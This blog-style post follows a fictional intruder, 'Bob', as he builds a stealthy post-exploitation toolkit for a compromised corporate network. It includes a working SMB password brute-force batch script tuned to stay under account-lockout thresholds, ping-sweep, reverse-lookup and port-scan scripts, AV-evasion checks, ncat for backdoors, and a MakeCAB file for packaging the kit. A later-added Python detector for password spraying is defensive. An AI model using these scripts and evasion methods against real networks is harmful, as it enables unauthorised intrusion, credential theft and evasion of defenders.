Bob Prepares For Action, by SynLe [2009-11-04] at 22:02:30
Summary: Bob's back and he's been thinking about his new playground. He's realised that if he's not careful he'll attract attention and get into trouble. He needs to lay down some ground rules and define some goals before he goes back on the Wallifords network. If he's going to get the maximum benefit from Wallifords as a training ground rather than a playground, he needs to get serious and stop recklessly throwing exploits at any old box.

Goal 1: To extract as much information about the Walliford network as possible.
Goal 2: To identify high value targets and gain access to those systems.
Goal 3: To remain undetected.
Goal 4: To generally have fun, learn his tools and practice his techniques.

Pretty simple goals, eh. Bob knows that to remain undetected he's going to have to use as many tools that are already on the compromised host as he can. He needs to use as many legitimate tools as possible and only upload those that won't be detected by AV. Bob needs to get his tools onto the compromised hosts, but uploading them one by one is a pain in the arse. Then he remembers something he heard in a great presentation on post exploitation from Dean Der Beer about using Metacab. He takes a look at Metacab but decides against using it. He really likes the idea, but he wants a different set of tools, so he goes about making his own version of Metacab. Using the Makecab tool already in XP he creates a cab file containing the few additional tools he needs, knowing he can upload and extract the files from the cab with native Windows tools straight from the command line. The one tool he cannot do without is netcat, but AV picks it up quite easily. Then he remembers that his Nmap directory has ncat, a new version of netcat with loads of additional features. Bob runs it through VirusTotal to see what gives. Perfect, only detected by one AV product out of 41. Now Bob knows that he can use this tool for file transfer, creating proxies and even backdoors.
Many of the other tools he decides to include in the cab file come from the Windows Resource Kit. This means that there is very little chance of them being detected by AV or looking like Potentially Unwanted Applications (PUA) on the host.

Tools list:
- cmd.exe
- dsadd.exe
- dsget.exe
- dsquery.exe
- edit.com
- ncat.exe
- net.exe
- ngrep.exe
- pmon.exe
- PortQry.exe
- reg.exe
- srvinfo.exe
- WinDump.exe

As expected, VirusTotal finds nothing wrong with his other tools, but then again why would it. So looking at his tools, Bob has his ncat for backdoors and file transfer, he has a port scanner, pmon for keeping an eye on his hosts' CPU and memory, tools for extracting anything out of Active Directory, packet sniffers, and SrvInfo which is great for looking at details of servers. He also includes a couple of standard tools such as Net.exe and Cmd.exe, which are there just in case they had been removed by the sysadmin. Hopefully he's got everything he needs for a successful expedition into the Walliford Fries network.

Bob also creates a few bat files that he can use for scanning and password checks. It's easier to create these now and include them in the cab than it is to write them on the fly. His first bat file is a simple bruteforce script that uses inbuilt Windows functions to bruteforce shares. He'll supply a user list (names.txt) and a common password list (words.txt) to the bat file. The password list will be common passwords and can be tweaked using the inbuilt DOS Edit tool when he's on the target, and the user lists will be generated from his enumeration tool dsquery. Before any bruteforcing is done Bob will be checking the password policies so he doesn't trip any account lockout thresholds. So if the account lockout policy triggers after 3 incorrect attempts in half an hour, he'll just try 2 common passwords on all accounts. As they say, slow and steady wins the race.
bf.bat (the percent signs and redirection characters were mangled in the scraped copy; restored here):

    Set /P target=Enter Target To Perform BF on:
    For /f %%i in (names.txt) do for /f %%j in (words.txt) do (echo %%i %%j & net use \\%target% %%j /u:%%i 2>nul && echo %%i %%j >> creds.txt & net use \\%target% /del)

Bob will use either net.exe or dsquery.exe to populate his names.txt file. Dsquery is fantastic for ripping through Active Directory, and if you know what you're doing you can use these tools to find out pretty much anything about users and computers. The beauty is, these tools can be run from any user account, so you don't need to pop an admin's box to get some juicy info.

The next bat file that Bob will include (pingsweep.bat) checks for hosts that respond to a ping and outputs the results:

    set /P subnet=Enter subnet:
    for /L %%i in (1,1,255) do ping -n 1 -w 1 %subnet%.%%i | find "Reply"

Another bat file (rev-lookup.bat) performs reverse lookups using an nslookup FOR loop:

    set /P subnet=Enter subnet:
    For /L %%i in (1,1,255) do nslookup %subnet%.%%i 2>nul | find "Name" && echo %subnet%.%%i

And finally a bat file (port-scan.bat) uses the PortQry tool for port scans against hosts in a host file (hosts.txt). Again he can use dsquery or net.exe to populate the hosts file.

    For /F %%i in (hosts.txt) do PortQry.exe -n %%i -o 21,22,23,25,80,139,445,3389,1433,1434 -p tcp

OK, that'll do for now. Bob builds his ddf file for his cab file and creates the cab.
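The defender's side of the lockout-aware guessing described above, added here as an illustration that is not part of the original post: when every account is tried fewer times than the lockout threshold (2 guesses against a 3-in-30-minutes policy), no lockout ever fires, so the only signal left is breadth, one source failing against many distinct accounts inside a single lockout window. The record format (timestamp, source, account) and the sample failed-logon lines are constructed for this example; the thresholds are parameters you would set from your own policy.

```python
"""Spot low-and-slow credential spraying in failed-logon records.

Illustration added to the page, not the original author's code.  The
record format and the sample lines below are constructed; in practice the
fields would come from Security log 4625 / NTLM failure events on the file
server that receives the `net use` attempts.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source tries 2 passwords against 5 accounts (stays
# under a 3-attempt lockout), a second source hammers one account 4 times,
# a third source is a single stray failure.  Format: timestamp,source,account
SAMPLE_LOG = """\
2009-11-04T22:01:10,10.1.1.50,jsmith
2009-11-04T22:01:11,10.1.1.50,jsmith
2009-11-04T22:01:12,10.1.1.50,afox
2009-11-04T22:01:13,10.1.1.50,afox
2009-11-04T22:01:14,10.1.1.50,bking
2009-11-04T22:01:15,10.1.1.50,bking
2009-11-04T22:01:16,10.1.1.50,cmoss
2009-11-04T22:01:17,10.1.1.50,cmoss
2009-11-04T22:01:18,10.1.1.50,dpatel
2009-11-04T22:01:19,10.1.1.50,dpatel
2009-11-04T22:05:00,10.1.1.77,jsmith
2009-11-04T22:05:30,10.1.1.77,jsmith
2009-11-04T22:06:00,10.1.1.77,jsmith
2009-11-04T22:06:30,10.1.1.77,jsmith
2009-11-04T23:30:00,10.1.1.90,eroth
"""


def parse_log(text):
    """Parse 'timestamp,source,account' lines into sorted (datetime, source, account) tuples."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, source, account = line.split(",")
        records.append((datetime.fromisoformat(ts), source, account.lower()))
    return sorted(records)


def find_spraying(records, lockout_threshold=3,
                  lockout_window=timedelta(minutes=30), min_accounts=5):
    """Classify each source by its busiest lockout window.

    "lockout_brute_force": some account was tried lockout_threshold or more
        times within one window (the lockout policy itself will fire).
    "spray_under_lockout": at least min_accounts distinct accounts were tried,
        each fewer than lockout_threshold times (no lockout, breadth is the tell).
    Sources matching neither rule are omitted from the result.
    """
    by_source = defaultdict(list)
    for ts, source, account in records:          # records are already time-sorted
        by_source[source].append((ts, account))

    findings = {}
    for source, events in by_source.items():
        max_accounts = 0
        max_per_account = 0
        # Slide a lockout-sized window over this source's failures.
        for start_idx, (start_ts, _) in enumerate(events):
            per_account = defaultdict(int)
            for ts, account in events[start_idx:]:
                if ts - start_ts > lockout_window:
                    break
                per_account[account] += 1
            max_accounts = max(max_accounts, len(per_account))
            max_per_account = max(max_per_account, max(per_account.values()))

        if max_per_account >= lockout_threshold:
            kind = "lockout_brute_force"
        elif max_accounts >= min_accounts:
            kind = "spray_under_lockout"
        else:
            continue
        findings[source] = {"accounts": max_accounts,
                            "max_per_account": max_per_account,
                            "kind": kind}
    return findings


if __name__ == "__main__":
    for source, finding in find_spraying(parse_log(SAMPLE_LOG)).items():
        print(source, finding)
```

The point of the two rules is that a lockout policy only alerts on the second pattern; the first source never triggers it, so the alert has to key on the number of distinct accounts a single source fails against within the lockout window, which is exactly the quantity the spraying strategy maximises.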
bin.ddf:

    ; MakeCAB Directive File for bin
    .OPTION EXPLICIT     ; Generate errors
    .Set MaxCabinetSize=0
    .Set MaxDiskSize=0
    .Set CabinetNameTemplate=bin.cab
    .set DiskDirectoryTemplate=CDROM
    .Set CompressionType=MSZIP
    .Set UniqueFiles=OFF
    .Set Cabinet=on
    .Set DiskDirectory1=bin
    bf.bat
    cmd.exe
    dsadd.exe
    dsget.exe
    dsquery.exe
    edit.com
    hosts.txt
    names.txt
    ncat.exe
    net.exe
    ngrep.exe
    pingsweep.bat
    pmon.exe
    port-scan.bat
    PortQry.exe
    reg.exe
    rev-lookup.bat
    srvinfo.exe
    WinDump.exe
    words.txt

Now it's cab building time, at bloody last:

    makecab /F bin.ddf

Perfect, after building his cab file it comes in at less than 1MB; Bob honestly couldn't be happier. He'll have to use the Windows built-in tool called Expand.exe to get his files out of the cab:

    expand -F:* bin.cab .

Right, with that done Bob is ready to hop onto his target, put his tools to good use and start his network exploration.